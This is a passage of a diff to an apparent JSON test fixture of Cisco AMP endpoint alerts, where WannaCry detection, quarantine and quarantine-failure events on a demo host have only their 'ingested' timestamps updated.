\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2299,7 +2299,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763931100Z", + "ingested": "2021-12-14T14:40:45.520866690Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2400,7 +2400,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763937100Z", + "ingested": "2021-12-14T14:40:45.520867149Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2478,7 +2478,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763941700Z", + "ingested": "2021-12-14T14:40:45.520867556Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2550,7 +2550,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763946600Z", + "ingested": "2021-12-14T14:40:45.520867992Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2622,7 +2622,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763952200Z", + "ingested": "2021-12-14T14:40:45.520868402Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2694,7 +2694,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763957400Z", + "ingested": "2021-12-14T14:40:45.520868794Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2766,7 +2766,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763963800Z", + "ingested": "2021-12-14T14:40:45.520869323Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558983\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -2838,7 +2838,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763969900Z", + "ingested": "2021-12-14T14:40:45.520869735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558982\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2914,7 +2914,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763975900Z", + "ingested": "2021-12-14T14:40:45.520870129Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558980\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2990,7 +2990,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763980600Z", + "ingested": "2021-12-14T14:40:45.520870519Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3066,7 +3066,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.763984300Z", + "ingested": "2021-12-14T14:40:45.520870928Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -3167,7 +3167,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764004700Z", + "ingested": "2021-12-14T14:40:45.520871377Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":580000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\",\"sha1\":\"be5d6279874da315e3080b06083757aad9b32c23\",\"md5\":\"8495400f199ac77853c53b5a3f278f3e\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": 
"1090519054", "kind": "alert", 
@@ -3270,7 +3270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764011100Z", + "ingested": "2021-12-14T14:40:45.520871771Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":564000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\",\"sha1\":\"47a9ad4125b6bd7c55e4e7da251e23f089407b8f\",\"md5\":\"4fef5e34143e646dbf9907c4374276f5\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}}", "code": 
"1090519054", "kind": "alert", @@ -3348,7 +3348,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764074200Z", + "ingested": "2021-12-14T14:40:45.520872178Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":782000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558981\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3420,7 +3420,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764078800Z", + "ingested": "2021-12-14T14:40:45.520872564Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303569945526000,\"timestamp\":1610652550,\"timestamp_nanoseconds\":751000000,\"date\":\"2021-01-14T19:29:10+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", 
@@ -3508,7 +3508,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764083500Z", + "ingested": "2021-12-14T14:40:45.520872952Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -3598,7 +3598,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:39.764088400Z", + "ingested": "2021-12-14T14:40:45.520873394Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":783000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat 